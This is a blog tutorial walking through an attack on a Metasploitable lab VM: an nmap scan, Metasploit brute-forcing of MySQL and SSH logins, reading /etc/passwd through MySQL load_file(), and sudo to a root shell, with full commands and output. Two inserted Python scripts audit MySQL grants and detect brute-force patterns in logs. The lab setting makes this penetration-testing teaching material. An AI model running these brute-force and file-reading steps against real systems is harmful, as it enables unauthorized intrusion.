11 Jun. 2010

MySQL Intrusion and Then Getting a Root Shell

Hi, today I'll do a short tutorial with Metasploit on breaking into a MySQL database and then getting a root shell over SSH.

Shall we start?

We scan the ports with NMAP:
nmap -sV --allports --version-all 192.168.1.34
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.1
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB
8009/tcp open  ajp13?
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1

Here is what interests us:
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5

Let's open Metasploit.
We'll use the auxiliary module
mysql_login
msf > use scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options

Module options:

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             yes       Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             3306             yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

We add the host:
msf auxiliary(mysql_login) > set RHOSTS 192.168.1.34
RHOSTS => 192.168.1.34

Now we set the user it will log in as; in my case I'm going to try root:
msf auxiliary(mysql_login) > set USERNAME root
USERNAME => root

And now I'll use the PASS_FILE option to brute-force the login :P and try to log in with those passwords :P
msf auxiliary(mysql_login) > set PASS_FILE /home/linuxfer/Escritorio/pass.txt
PASS_FILE => /home/linuxfer/Escritorio/pass.txt

We run the auxiliary:
msf auxiliary(mysql_login) > run
[*] 192.168.1.34:3306 - Found remote MySQL version 5.0.51a
[*] 192.168.1.34:3306 Trying username:'root' with password:''
[*] 192.168.1.34:3306 failed to login as 'root' with password ''
[*] 192.168.1.34:3306 Trying username:'root' with password:'murderking'
[*] 192.168.1.34:3306 failed to login as 'root' with password 'murderking'
[*] 192.168.1.34:3306 Trying username:'root' with password:'duraznin'
[*] 192.168.1.34:3306 failed to login as 'root' with password 'duraznin'
[*] 192.168.1.34:3306 Trying username:'root' with password:'pete'
[*] 192.168.1.34:3306 failed to login as 'root' with password 'pete'
[*] 192.168.1.34:3306 Trying username:'root' with password:'oxono'
[*] 192.168.1.34:3306 failed to login as 'root' with password 'oxono'
[*] 192.168.1.34:3306 Trying username:'root' with password:'puto'
[*] 192.168.1.34:3306 failed to login as 'root' with password 'puto'
[*] 192.168.1.34:3306 Trying username:'root' with password:'root'
[+] 192.168.1.34:3306 - SUCCESSFUL LOGIN 'root' : 'root'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_login) > 

As we can see, it logged in with root / root:
192.168.1.34:3306 - SUCCESSFUL LOGIN 'root' : 'root'

We open a new terminal and run
mysql -h 192.168.1.34 -u root -proot
-h: host
-u: user
-p: password (written with no space before the password; "-p root" would prompt for a password and treat "root" as a database name)

$ mysql -h 192.168.1.34 -u root -proot
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 38
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> 

We are now inside the MySQL server
mysql> show grants;
+--------------------------------------------------------------------------------------------------------------------------------+
| Grants for root@%                                                                                                              |
+--------------------------------------------------------------------------------------------------------------------------------+
| GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY PASSWORD '*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B' WITH GRANT OPTION |
+--------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)

Let's have a look at the accounts :P
mysql> select load_file('/etc/passwd');
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
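The GRANT line shown earlier is what makes this load_file() read possible: ALL PRIVILEGES on *.* includes the FILE privilege, and the account is reachable from any host. As an added example (not part of the original tutorial), this Python script parses SHOW GRANTS output and flags those conditions; the sample grants are constructed, modelled on the root grant seen above.

```python
import re

# Constructed SHOW GRANTS output (not captured from a server), modelled on the
# root grant the tutorial sees on Metasploitable plus two tighter accounts.
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY PASSWORD "
    "'*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B' WITH GRANT OPTION",
    "GRANT SELECT, INSERT ON `app`.* TO 'app'@'10.0.0.5'",
    "GRANT FILE ON *.* TO 'reports'@'localhost'",
]

GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+"
    r"'(?P<user>[^']*)'@'(?P<host>[^']*)'(?P<rest>.*)$"
)

def audit_grant(stmt):
    """Return the findings for one GRANT statement (empty list if nothing notable)."""
    m = GRANT_RE.match(stmt)
    if not m:
        return ["unparsed grant: " + stmt]
    privs = {p.strip().upper() for p in m.group("privs").split(",")}
    host, scope, rest = m.group("host"), m.group("scope"), m.group("rest")
    findings = []
    if "%" in host:
        findings.append("wildcard host: account is reachable from any address")
    if "ALL PRIVILEGES" in privs and scope == "*.*":
        findings.append("ALL PRIVILEGES on *.*")
    # FILE (included in ALL) at global scope is what lets LOAD_FILE() and
    # SELECT ... INTO OUTFILE touch the filesystem, subject to secure_file_priv.
    if scope == "*.*" and privs & {"FILE", "ALL PRIVILEGES"}:
        findings.append("FILE privilege: LOAD_FILE()/INTO OUTFILE available")
    if "WITH GRANT OPTION" in rest.upper():
        findings.append("WITH GRANT OPTION: can hand its privileges to other accounts")
    return findings

def audit_grants(stmts):
    """Map 'user@host' to its findings for every statement in SHOW GRANTS output."""
    report = {}
    for stmt in stmts:
        m = GRANT_RE.match(stmt)
        account = f"{m.group('user')}@{m.group('host')}" if m else stmt
        report[account] = audit_grant(stmt)
    return report

if __name__ == "__main__":
    for account, findings in audit_grants(SAMPLE_GRANTS).items():
        print(account, "->", findings or ["ok"])
```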

Hmmm... it looks like the user is msfadmin. Let's go back to Metasploit; now we'll use the auxiliary module
scanner/ssh/ssh_login
msf auxiliary(mysql_login) > use scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options

Module options:

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             yes       Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

We add the host:
msf auxiliary(ssh_login) > set RHOSTS 192.168.1.34
RHOSTS => 192.168.1.34

We add the user:
msf auxiliary(ssh_login) > set USERNAME msfadmin
USERNAME => msfadmin

We add the passwords we want it to brute-force with:
msf auxiliary(ssh_login) > set PASS_FILE /home/linuxfer/Escritorio/pass2.txt
PASS_FILE => /home/linuxfer/Escritorio/pass2.txt

We run the auxiliary:
msf auxiliary(ssh_login) > run

[*] 192.168.1.34:22 - SSH - Starting buteforce
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: ''
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':''
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'jaja'
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'jaja'
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'pete'
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'pete'
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'tutorial'
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'tutorial'
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'ddlr'
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'ddlr'
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'pam'
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'pam'
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'paquero'
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'paquero'
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'duraznin'
[-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'duraznin'
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'msfadmin'
[*] Command shell session 1 opened (192.168.1.33:58907 -> 192.168.1.34:22) at Thu Jun 10 17:55:19 -0300 2010
[+] 192.168.1.34:22 - SSH - Success: 'msfadmin':'msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
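Both brute-force runs above (mysql_login and ssh_login) leave the same footprint on the target: a burst of failed logins from one source for one user, then a success. This added Python example (not from the tutorial) scores constructed MySQL error-log and sshd auth.log lines for that pattern; it assumes failed MySQL logins are actually written to the error log, which is not the default on a 5.0-era server.

```python
import re
from collections import defaultdict

# Constructed log lines (not captured from the tutorial's target) shaped like
# what the two runs above would leave behind: MySQL error-log entries (only
# written if the server logs failed logins) and sshd entries in auth.log.
SAMPLE_LOGS = """\
100610 17:50:01 [Warning] Access denied for user 'root'@'192.168.1.33' (using password: NO)
100610 17:50:01 [Warning] Access denied for user 'root'@'192.168.1.33' (using password: YES)
100610 17:50:02 [Warning] Access denied for user 'root'@'192.168.1.33' (using password: YES)
100610 17:50:02 [Warning] Access denied for user 'root'@'192.168.1.33' (using password: YES)
Jun 10 17:55:10 metasploitable sshd[4123]: Failed password for msfadmin from 192.168.1.33 port 58901 ssh2
Jun 10 17:55:12 metasploitable sshd[4125]: Failed password for msfadmin from 192.168.1.33 port 58903 ssh2
Jun 10 17:55:15 metasploitable sshd[4127]: Failed password for msfadmin from 192.168.1.33 port 58905 ssh2
Jun 10 17:55:19 metasploitable sshd[4129]: Accepted password for msfadmin from 192.168.1.33 port 58907 ssh2
Jun 10 18:01:00 metasploitable sshd[4200]: Accepted publickey for user from 192.168.1.50 port 40000 ssh2
"""

MYSQL_FAIL = re.compile(r"Access denied for user '(?P<user>[^']*)'@'(?P<src>[^']*)'")
SSH_AUTH = re.compile(r"sshd\[\d+\]: (?P<result>Failed|Accepted) \w+ for "
                      r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+)")

def detect_bruteforce(log_text, threshold=3):
    """Return {(service, src, user): verdict} for every source that reached
    `threshold` failed logins; the verdict is 'bruteforce-success' when a
    later success from the same source/user shows a password was guessed."""
    fails = defaultdict(int)
    guessed = set()
    for line in log_text.splitlines():
        m = MYSQL_FAIL.search(line)
        if m:  # the MySQL error log records only the denial, so no success tracking here
            fails[("mysql", m.group("src"), m.group("user"))] += 1
            continue
        m = SSH_AUTH.search(line)
        if not m:
            continue
        key = ("ssh", m.group("src"), m.group("user"))
        if m.group("result") == "Failed":
            fails[key] += 1
        elif fails.get(key, 0) > 0:
            guessed.add(key)
    return {key: ("bruteforce-success" if key in guessed else "bruteforce")
            for key, n in fails.items() if n >= threshold}

if __name__ == "__main__":
    for key, verdict in detect_bruteforce(SAMPLE_LOGS).items():
        print(verdict, key)
```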

Look at that, it logged in with msfadmin / msfadmin:
[*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'msfadmin'
[*] Command shell session 1 opened (192.168.1.33:58907 -> 192.168.1.34:22) at Thu Jun 10 17:55:19 -0300 2010
[+] 192.168.1.34:22 - SSH - Success: 'msfadmin':'msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '

OK, the shell session is created now; let's take a look:
Active sessions
===============

  Id  Type   Information                              Connection
  --  ----   -----------                              ----------
  1   shell  SSH msfadmin:msfadmin (192.168.1.34:22)  192.168.1.33:58907 -> 192.168.1.34:22
msf auxiliary(ssh_login) > sessions -i 1
[*] Starting interaction with 1...

id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
pwd
/home/msfadmin
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Alright, now let's open a new terminal and connect over SSH to get a root shell
$ ssh msfadmin@192.168.1.34
The authenticity of host '192.168.1.34 (192.168.1.34)' can't be established.
RSA key fingerprint is 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.34' (RSA) to the list of known hosts.
msfadmin@192.168.1.34's password: 

It asks for the password; remember it's msfadmin. We type it and:
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
Last login: Thu Jun 10 15:15:54 2010
msfadmin@metasploitable:~$ 

We have a shell; now we just type sudo -i and the password msfadmin, and we have a root shell (this works because msfadmin is in the admin group, which Ubuntu's default sudoers gives full sudo rights)
msfadmin@metasploitable:~$ sudo -i
[sudo] password for msfadmin: 
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:~# 

Game over (?)

Well, I hope you liked it and understood it all; sorry for not making a video, but I'm having some little problems :P


Author: linuxfer
Source: http://linuxfer.diosdelared.com/
